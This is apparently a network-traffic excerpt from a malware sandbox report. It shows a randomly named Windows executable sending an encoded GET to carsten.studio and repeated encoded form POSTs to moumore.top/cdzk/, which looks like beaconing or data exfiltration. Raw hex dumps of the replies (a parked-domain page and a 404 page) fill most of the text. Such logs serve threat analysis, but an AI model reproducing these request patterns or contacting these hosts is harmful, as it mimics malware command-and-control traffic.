                                                  Nov 19, 2024 03:56:40.467340946 CET464OUTGET /bdk6/?5lf8fv8H=PqqBR4APLBjeVAmu2KnBSDyL46X5a3+HeWwKYykJckqyTL6p8r6dck4h/UhP8B2/GHgzxj3GR86X2rSMsvymfcz7/xb/ILUp+u45DggP4jd1Psv37cGY6aI=&AjEdl=yJNdk0d HTTP/1.1
                                                  Host: www.carsten.studio
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-us
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                  Nov 19, 2024 03:56:41.740046024 CET1236INHTTP/1.1 200 OK
                                                  Content-Type: text/html
                                                  Content-Length: 4545
                                                  Connection: close
                                                  Date: Tue, 19 Nov 2024 02:56:41 GMT
                                                  Server: Apache
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 54 52 41 54 4f 20 2d 20 44 6f 6d 61 69 6e 20 72 65 73 65 72 76 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 4f 70 65 6e 20 53 61 6e 73 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 22 3e 0d 0a 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 33 66 33 66 33 3b 20 70 61 64 64 69 6e 67 3a 20 34 30 70 78 20 30 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 31 35 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html><html> <head> <title>STRATO - Domain reserved</title> </head> <body style="background-color: #fff; font-family: Open Sans, sans-serif; padding: 0; margin: 0;"> <div style="background-color: #f3f3f3; padding: 40px 0; width: 100%;"> <div style="width: 150px; margin-left: auto; margin-right: auto;"><a href="https://www.strato.de" rel="nofollow" style="border: 0;"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 157.4 33.7"><defs><style>.a{fill:#f80;}.b{fill:#f80;}</style></defs><title>STRATO</title><path class="a" d="M17.8,7a4.69,4.69,0,0,1-4.7-4.7H29.6A4.69,4.69,0,0,1,34.3,7V23.5a4.69,4.69,0,0,1-4.7-4.7V9.4A2.37,2.37,0,0,0,27.2,7Z" transform="translate(-1.3 -2.3)"/><path class="b" d="M57.7,32.9c-1.3,2.5-4.7,2.6-7.3,2.6-2.1,0-4-.1-5.2-.2-1.5-.1-1.8-.5-1.8-1.3V32.9c0-1.3.2-1.7,1.4-1.7,2.1,0,3.1.2,6.2.2,2.4,0,2.9-.2,2.9-2.3,0-2.4,0-2.5-1.3-3.1a42.2,42.2,0,0,0-4.5-1.8c-3.7-1.6-4.4-2.3-4.4-6.5,0-2.6.5-4.8,3.4-5.7a14,14,0,0,1,4.9-.6c1.6, [TRUNCATED]
                                                  Nov 19, 2024 03:56:41.740094900 CET1236INData Raw: 33 2c 30 2c 31 2e 36 2c 31 2e 33 2c 32 2e 31 2e 39 2e 35 2c 32 2c 2e 38 2c 32 2e 39 2c 31 2e 33 2c 34 2e 39 2c 32 2e 31 2c 36 2c 32 2e 35 2c 36 2c 36 2e 37 61 31 30 2e 31 32 2c 31 30 2e 31 32 2c 30 2c 30 2c 31 2d 2e 36 2c 34 2e 38 4d 37 37 2e 31
                                                  Data Ascii: 3,0,1.6,1.3,2.1.9.5,2,.8,2.9,1.3,4.9,2.1,6,2.5,6,6.7a10.12,10.12,0,0,1-.6,4.8M77.1,15.7c-2.1,0-3.7,0-5.2-.1v18a1.4,1.4,0,0,1-1.5,1.6H69c-1.1,0-1.7-.3-1.7-1.6V15.7c-1.5,0-3.2.1-5.3.1-1.5,0-1.5-.9-1.5-1.6v-.9A1.36,1.36,0,0,1,62,11.8H77.2c.8,0,1.
                                                  Nov 19, 2024 03:56:41.740112066 CET1236INData Raw: 35 73 2d 2e 36 2c 37 2e 31 2d 32 2e 36 2c 39 2e 35 4d 31 35 33 2c 31 37 2e 34 63 2d 2e 38 2d 31 2e 36 2d 32 2e 34 2d 32 2e 33 2d 34 2e 34 2d 32 2e 33 73 2d 33 2e 36 2e 36 2d 34 2e 34 2c 32 2e 33 63 2d 2e 37 2c 31 2e 35 2d 2e 38 2c 34 2e 34 2d 2e
                                                  Data Ascii: 5s-.6,7.1-2.6,9.5M153,17.4c-.8-1.6-2.4-2.3-4.4-2.3s-3.6.6-4.4,2.3c-.7,1.5-.8,4.4-.8,6.1s.1,4.6.8,6.1,2.4,2.3,4.4,2.3,3.6-.7,4.4-2.3.8-4.2.8-6.1-.1-4.6-.8-6.1" transform="translate(-1.3 -2.3)"/><path class="a" d="M24.9,14a2.26,2.26,0,0,0-2.3-2.
                                                  Nov 19, 2024 03:56:41.740128040 CET975INData Raw: 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 22 20 6c 61 6e 67 3d 22 6e 6c 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 20 66 6f 6e 74 2d 77 65
                                                  Data Ascii: padding-bottom: 30px" lang="nl"><span style="font-size: 14px; color: #777; font-weight: bold;">Nederlands</span><br>Deze website werd zojuist geregistreerd. Een webinhoud werd nog niet toegevoegd.</div> <div style="padding-bottom: 30px"


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  5192.168.2.449961203.161.46.205804628C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 19, 2024 03:56:47.609901905 CET721OUTPOST /cdzk/ HTTP/1.1
                                                  Host: www.moumore.top
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate
                                                  Accept-Language: en-us
                                                  Connection: close
                                                  Content-Length: 205
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.moumore.top
                                                  Referer: http://www.moumore.top/cdzk/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                  Data Raw: 35 6c 66 38 66 76 38 48 3d 37 33 2b 34 79 7a 6f 78 43 70 47 4d 33 68 4a 7a 73 33 44 72 4b 55 6c 67 55 35 44 35 32 68 6f 4c 63 43 36 74 36 30 74 43 64 5a 49 50 36 49 46 62 41 46 41 55 76 52 61 6a 6b 36 75 6f 7a 58 43 43 42 57 75 41 77 43 45 65 42 6c 42 45 36 6a 47 38 30 68 61 74 37 62 73 69 66 4f 4e 74 73 57 65 51 63 51 58 2b 77 47 2b 5a 44 6a 6a 62 76 52 49 53 2b 59 75 62 65 78 79 36 6f 77 2f 49 71 59 76 50 77 73 75 7a 6b 4c 4a 74 44 61 75 45 76 61 78 77 73 74 74 71 47 49 4f 4d 4d 62 50 65 32 6f 50 52 53 37 72 63 38 62 2f 34 62 31 79 78 2b 52 70 77 59 4e 58 71 44 6f 59 7a 77 35 33 51 30 4c 35 48 30 67 3d 3d
                                                  Data Ascii: 5lf8fv8H=73+4yzoxCpGM3hJzs3DrKUlgU5D52hoLcC6t60tCdZIP6IFbAFAUvRajk6uozXCCBWuAwCEeBlBE6jG80hat7bsifONtsWeQcQX+wG+ZDjjbvRIS+Yubexy6ow/IqYvPwsuzkLJtDauEvaxwsttqGIOMMbPe2oPRS7rc8b/4b1yx+RpwYNXqDoYzw53Q0L5H0g==
                                                  Nov 19, 2024 03:56:48.389317989 CET1236INHTTP/1.1 404 Not Found
                                                  Date: Tue, 19 Nov 2024 02:56:48 GMT
                                                  Server: Apache
                                                  Content-Length: 16052
                                                  Connection: close
                                                  Content-Type: text/html
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                  Nov 19, 2024 03:56:48.389386892 CET1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                  Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                  Nov 19, 2024 03:56:48.389441967 CET1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                  Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                  Nov 19, 2024 03:56:48.389549971 CET1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                  Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                  Nov 19, 2024 03:56:48.389585972 CET1236INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                                  Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                                  Nov 19, 2024 03:56:48.389626980 CET1236INData Raw: 35 31 2c 31 2e 35 32 31 36 35 20 30 2e 32 32 32 39 39 2c 31 2e 30 36 35 37 39 20 30 2e 31 34 39 33 33 2c 30 2e 36 30 39 31 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c
                                                  Data Ascii: 51,1.52165 0.22299,1.06579 0.14933,0.60912" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4533" d=
                                                  Nov 19, 2024 03:56:48.389659882 CET1236INData Raw: 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20
                                                  Data Ascii: ke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541" d="m 85.206367,122.98266 c 0.117841,11.74369 0.235693,23.48835 0.235693,36.55072 -10e-7,13.06238 -0.117833,27.43796 -0.05891,45
                                                  Nov 19, 2024 03:56:48.389695883 CET1236INData Raw: 2c 32 36 2e 37 30 30 33 33 20 2d 32 2e 32 39 38 33 39 34 2c 36 2e 39 35 33 36 32 20 2d 32 2e 32 39 38 33 39 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39
                                                  Data Ascii: ,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-w
                                                  Nov 19, 2024 03:56:48.389729977 CET1236INData Raw: 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 32 2e 36 38 37 35 2c 32 36 33 2e 33
                                                  Data Ascii: 1;" /> <path id="path4529" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-
                                                  Nov 19, 2024 03:56:48.389765024 CET460INData Raw: 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 30 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72
                                                  Data Ascii: ll-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567"
                                                  Nov 19, 2024 03:56:48.394925117 CET1236INData Raw: 32 2c 30 2e 31 33 30 31 20 7a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f
                                                  Data Ascii: 2,0.1301 z" style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-1


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  6192.168.2.449973203.161.46.205804628C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 19, 2024 03:56:50.155286074 CET741OUTPOST /cdzk/ HTTP/1.1
                                                  Host: www.moumore.top
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate
                                                  Accept-Language: en-us
                                                  Connection: close
                                                  Content-Length: 225
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.moumore.top
                                                  Referer: http://www.moumore.top/cdzk/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                  Data Raw: 35 6c 66 38 66 76 38 48 3d 37 33 2b 34 79 7a 6f 78 43 70 47 4d 32 42 35 7a 67 32 44 72 42 55 6c 6a 65 5a 44 35 38 42 6f 48 63 43 32 74 36 31 35 6f 63 72 63 50 37 6f 31 62 44 45 41 55 6f 52 61 6a 75 61 75 68 72 33 43 46 42 58 53 6d 77 44 6f 65 42 6c 46 45 36 6a 57 38 30 32 4f 69 70 37 73 6b 5a 4f 4e 6a 68 32 65 51 63 51 58 2b 77 47 61 7a 44 6a 4c 62 73 69 41 53 2f 35 75 61 58 52 79 37 2b 67 2f 49 37 6f 76 4c 77 73 75 4e 6b 4a 38 47 44 63 69 45 76 61 42 77 73 38 74 74 50 49 4f 4b 43 37 50 56 33 49 65 74 56 49 4f 63 38 59 43 66 44 30 61 4b 79 33 6b 71 4a 38 32 39 52 6f 38 41 74 2b 2b 6b 35 49 45 4f 76 76 77 76 66 79 36 45 48 6b 6a 72 4f 68 2f 53 2f 5a 6f 6d 59 34 38 3d
                                                  Data Ascii: 5lf8fv8H=73+4yzoxCpGM2B5zg2DrBUljeZD58BoHcC2t615ocrcP7o1bDEAUoRajuauhr3CFBXSmwDoeBlFE6jW802Oip7skZONjh2eQcQX+wGazDjLbsiAS/5uaXRy7+g/I7ovLwsuNkJ8GDciEvaBws8ttPIOKC7PV3IetVIOc8YCfD0aKy3kqJ829Ro8At++k5IEOvvwvfy6EHkjrOh/S/ZomY48=
                                                  Nov 19, 2024 03:56:50.916845083 CET1236INHTTP/1.1 404 Not Found
                                                  Date: Tue, 19 Nov 2024 02:56:50 GMT
                                                  Server: Apache
                                                  Content-Length: 16052
                                                  Connection: close
                                                  Content-Type: text/html
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                  Nov 19, 2024 03:56:50.916955948 CET212INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                  Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-268
                                                  Nov 19, 2024 03:56:50.916990042 CET1236INData Raw: 35 2e 37 34 34 31 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30
                                                  Data Ascii: 5.7441)" style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000;stroke-width:0.1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" d="m 145.0586,263.51309 c -90.20375,-0.0994 -119.20375,-0.0994 -119
                                                  Nov 19, 2024 03:56:50.917026043 CET1236INData Raw: 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 34 39 36 22 0a 20 20 20 20
                                                  Data Ascii: nejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0071,6.75165 -0.0107,10.12897 m 0.512159,0.18258 c -1.914603,-0.23621 -3.505591,1.17801 -4.861444,2.68113 -
                                                  Nov 19, 2024 03:56:50.917067051 CET1236INData Raw: 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 31 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 37 34 2e
                                                  Data Ascii: ke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.3433 -18.781379,20.01048 -5.583823,6.66719 -10.749655,1
                                                  Nov 19, 2024 03:56:50.917125940 CET636INData Raw: 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72
                                                  Data Ascii: none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.2
                                                  Nov 19, 2024 03:56:50.917161942 CET1236INData Raw: 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64
                                                  Data Ascii: p:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012
                                                  Nov 19, 2024 03:56:50.917201996 CET1236INData Raw: 30 35 2c 35 2e 38 30 34 31 36 20 31 2e 34 35 38 35 30 35 2c 36 2e 39 38 32 35 37 20 32 2e 34 30 32 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34
                                                  Data Ascii: 05,5.80416 1.458505,6.98257 2.402021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53
                                                  Nov 19, 2024 03:56:50.917236090 CET424INData Raw: 33 39 20 31 2e 31 31 39 39 33 32 2c 31 39 2e 38 30 33 37 39 20 32 2e 34 31 35 35 37 34 2c 33 37 2e 30 30 30 34 39 20 33 2e 37 31 32 30 30 35 2c 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70
                                                  Data Ascii: 39 1.119932,19.80379 2.415574,37.00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549"
                                                  Nov 19, 2024 03:56:50.917272091 CET1236INData Raw: 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39 33 20 32 2e 38 32 38 31 38 32 2c 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34
                                                  Data Ascii: 4,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-
